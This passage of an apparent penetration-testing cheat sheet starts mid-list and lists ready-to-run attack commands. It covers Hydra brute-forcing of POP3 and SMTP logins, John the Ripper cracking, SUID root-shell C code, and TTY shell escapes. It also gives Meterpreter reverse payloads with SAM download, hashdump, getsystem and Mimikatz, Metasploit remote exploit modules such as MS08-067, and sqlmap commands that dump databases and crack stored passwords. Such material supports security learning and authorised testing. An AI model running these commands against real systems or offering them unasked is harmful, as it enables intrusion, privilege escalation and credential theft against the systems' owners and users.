Hydra POP3 brute force.
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V

Hydra SMTP Brute Force:
COMMAND DESCRIPTION:
Hydra SMTP brute force.
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V

Use -t to limit concurrent connections, example: -t 15

Password Cracking:
Password cracking penetration testing tools.

John The Ripper – JTR:
COMMAND DESCRIPTION:
JTR password cracking.
john –wordlist=/usr/share/wordlists/rockyou.txt hashes

JTR forced decrypt cracking with a wordlist.
john –format=descrypt –wordlist
/usr/share/wordlists/rockyou.txt hash.txt

JTR forced decrypt brute force cracking.
john –format=descrypt hash –show

Windows Penetration Testing Commands:
See Windows Penetration Testing Commands.

Linux Penetration Testing Commands
See Linux Commands Cheat Sheet in another post for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits
Some notes on compiling exploits.

Identifying if C code is for Windows or Linux:
C #includes will indicate which OS should be used to build the exploit.

COMMAND DESCRIPTION:
Windows exploit code.
process.h, string.h, winbase.h, windows.h, winsock2.h

Linux exploit code.
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h

Build Exploit GCC:
Compile exploit gcc.

COMMAND DESCRIPTION:
Basic GCC compile.
gcc -o exploit exploit.c

GCC Compile 32Bit Exploit on 64Bit Kali:
Handy for cross-compiling 32 bit binaries on 64 bit attacking machines.

COMMAND DESCRIPTION:
Cross compile 32 bit binary on 64 bit Linux
gcc -m32 exploit.c -o exploit

Compile Windows .exe on Linux:
Build / compile windows exploits on Linux, resulting in a .exe file.

COMMAND DESCRIPTION:
Compile windows .exe on Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

SUID Binary:
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash:

int main(void){
setresuid(0, 0, 0);
system(“/bin/bash”);
}

SUID C Shell for /bin/sh:
int main(void){
setresuid(0, 0, 0);
system(“/bin/sh”);
}

Building the SUID Shell binary:
gcc -o suid suid.c

For 32 bit:
gcc -m32 -o suid suid.c

Reverse Shells:
See Reverse Shell Cheat Sheet in another post for a list of useful Reverse Shells.

TTY Shells:
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
echo os.system(‘/bin/bash’)

Spawn Interactive sh shell:
/bin/sh -i

Spawn Perl TTY Shell:
exec “/bin/sh”;
perl —e ‘exec “/bin/sh”;’

Spawn Ruby TTY Shell:
exec “/bin/sh”

Spawn Lua TTY Shell:
os.execute(‘/bin/sh’)

Spawn TTY Shell from Vi:
Run shell commands from vi:
:!bash

Spawn TTY Shell NMAP:
!sh

Metasploit Cheat Sheet:
A basic metasploit cheat sheet that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads:
Windows reverse meterpreter payload:
COMMAND DESCRIPTION:
Windows reverse tcp payload.
set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload:
COMMAND DESCRIPTION:
Meterpreter Windows VNC Payload.
set payload windows/vncinject/reverse_tcp
set ViewOnly false

Linux Reverse Meterpreter payload:
COMMAND DESCRIPTION:
Meterpreter Linux Reverse Payload.
set payload linux/meterpreter/reverse_tcp

Meterpreter Cheat Sheet:
Useful meterpreter commands.

COMMAND DESCRIPTION:
Meterpreter upload file to Windows target.
upload file c:\windows

Meterpreter download file from Windows target.
download c:\windows\repair\sam /tmp

Meterpreter download file from Windows target.
download c:\windows\repair\sam /tmp

Meterpreter run .exe on target – handy for executing uploaded exploits.
execute -f c:\windowstempexploit.exe

Creates new channel with cmd shell.
execute -f cmd -c

Meterpreter show processes.
ps

Meterpreter get shell on the target.
shell

Meterpreter attempts priviledge escalation the target.
getsystem

Meterpreter attempts to dump the hashes on the target.
hashdump

Meterpreter create port forward to target machine.
portfwd add –l 3389 –p 3389 –r target

Meterpreter delete port forward.
portfwd delete –l 3389 –p 3389 –r target

Common Metasploit Modules:
Top metasploit modules.

Remote Windows Metasploit Modules (exploits)
COMMAND DESCRIPTION:
MS08_067 Windows 2k, XP, 2003 Remote Exploit.
use exploit/windows/smb/ms08_067_netapi

MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit.
use exploit/windows/dcerpc/ms06_040_netapi

MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit.
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Local Windows Metasploit Modules (exploits):
COMMAND DESCRIPTION:
Bypass UAC on Windows 7 + Set target + arch, x86/64
use exploit/windows/local/bypassuac

Auxilary Metasploit Modules:
COMMAND DESCRIPTION:
Metasploit HTTP directory scanner.
use auxiliary/scanner/http/dir_scanner

Metasploit JBOSS vulnerability scanner.
use auxiliary/scanner/http/jboss_vulnscan

Metasploit MSSQL Credential Scanner.
use auxiliary/scanner/mssql/mssql_login

Metasploit MSSQL Version Scanner.
use auxiliary/scanner/mysql/mysql_version

Metasploit Oracle Login Module.
use auxiliary/scanner/oracle/oracle_login

Metasploit Powershell Modules:
COMMAND DESCRIPTION:
Metasploit powershell payload delivery module.
use exploit/multi/script/web_delivery

Metasploit upload and run powershell script through a session.
post/windows/manage/powershell/exec_powershell

Metasploit JBOSS deploy.
use exploit/multi/http/jboss_maindeployer

Metasploit MSSQL payload.
use exploit/windows/mssql/mssql_payload

Post Exploit Windows Metasploit Modules:
Windows Metasploit Modules for privilege escalation.

COMMAND DESCRIPTION:
Metasploit show privileges of current user.
run post/windows/gather/win_privs

Metasploit grab GPP saved passwords.
use post/windows/gather/credentials/gpp

Metasplit load Mimikatz.
load mimikatz -> wdigest

Identify other machines that the supplied domain user has administrative access to.
run post/windows/gather/local_admin_search_enum

Automated dumping of sam file, tries to esc privileges etc.
run post/windows/gather/smart_hashdump

ASCII Table Cheat Sheet:
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII CHARACTER
x00 Null Byte

x08 BS

x09 TAB

x0a LF

x0d CR

x1b ESC

x20 SPC

x21 !

x22 ”

x23 #

x24 $

x25 %

x26 &

x27 `

x28 (

x29 )

x2a *

x2b +

x2c ,

x2d –

x2e .

x2f /

x30 0

x31 1

x32 2

x33 3

x34 4

x35 5

x36 6

x37 7

x38 8

x39 9

x3a :

x3b ;

x3c < x3d = x3e >

x3f ?

x40 @

x41 A

x42 B

x43 C

x44 D

x45 E

x46 F

x47 G

x48 H

x49 I

x4a J

x4b K

x4c L

x4d M

x4e N

x4f O

x50 P

x51 Q

x52 R

x53 S

x54 T

x55 U

x56 V

x57 W

x58 X

x59 Y

x5a Z

x5b [

x5c

x5d ]

x5e ^

x5f _

x60 `

x61 a

x62 b

x63 c

x64 d

x65 e

x66 f

x67 g

x68 h

x69 i

x6a j

x6b k

x6c l

x6d m

x6e n

x6f o

x70 p

x71 q

x72 r

x73 s

x74 t

x75 u

x76 v

x77 w

x78 x

x79 y

x7a z

CISCO IOS Commands:
A collection of useful Cisco IOS commands.

COMMAND DESCRIPTION:
Enters enable mode.
enable

Short for, configure terminal.
conf t

Configure FastEthernet 0/0.
(config)# interface fa0/0

Add ip to fa0/0.
(config-if)# ip addr 0.0.0.0 255.255.255.255

Configure vty line.
(config-if)# line vty 0 4

Cisco set telnet password.
(config-line)# login

Set telnet password
(config-line)# password YOUR-PASSWORD

Show running-config loaded in memory.
# show running-config

Show startup-config.
# show startup-config

show cisco IOS version.
# show version

display open sessions.
# show session

Show network interfaces.
# show ip interface

Show detailed interface info.
# show interface e0

Show routes.
# show ip route

Show access-lists.
# show access-lists

Show available files.
# dir file systems

File information.
# dir all-filesystems

SHow deleted files.
# dir /all

No limit on terminal output.
# terminal length 0

Copies running-config to tftp server.
# copy running-config tftp

Copy startup-config to running-config.
# copy running-config startup-config

Cryptography:
Hash Lengths:
HASH SIZE
MD5 Hash Length 16 Bytes

SHA-1 Hash Length 20 Bytes

SHA-256 Hash Length 32 Bytes

SHA-512 Hash Length 64 Bytes

Hash Examples:
Likely just use hash-identifier for this but here are some example hashes:

HASH EXAMPLE
MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5

MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461

MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426

SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b

SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014

SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024

SHA-256 127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935

SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4

SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617

SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f

SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd

SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a

NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b

SQLMap Examples:
A mini SQLMap cheat sheet:

COMMAND DESCRIPTION:
Automated sqlmap scan.
sqlmap -u http://meh.com –forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3

Targeted sqlmap scan.
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read=”/var/www/blah.php”

Scan url for union + error based injection with mysql backend and use a random user-agent + database dump.
sqlmap -u “http://meh.com/meh.php?id=1” –dbms=mysql –tech=U –random-agent –dump

sqlmap check form for injection.
sqlmap -o -u “http://meh.com/form/” –forms

sqlmap dump and crack hashes for table users on database-name.
sqlmap -o -u “http://meh/vuln-form” –forms -D database-name -T users –dump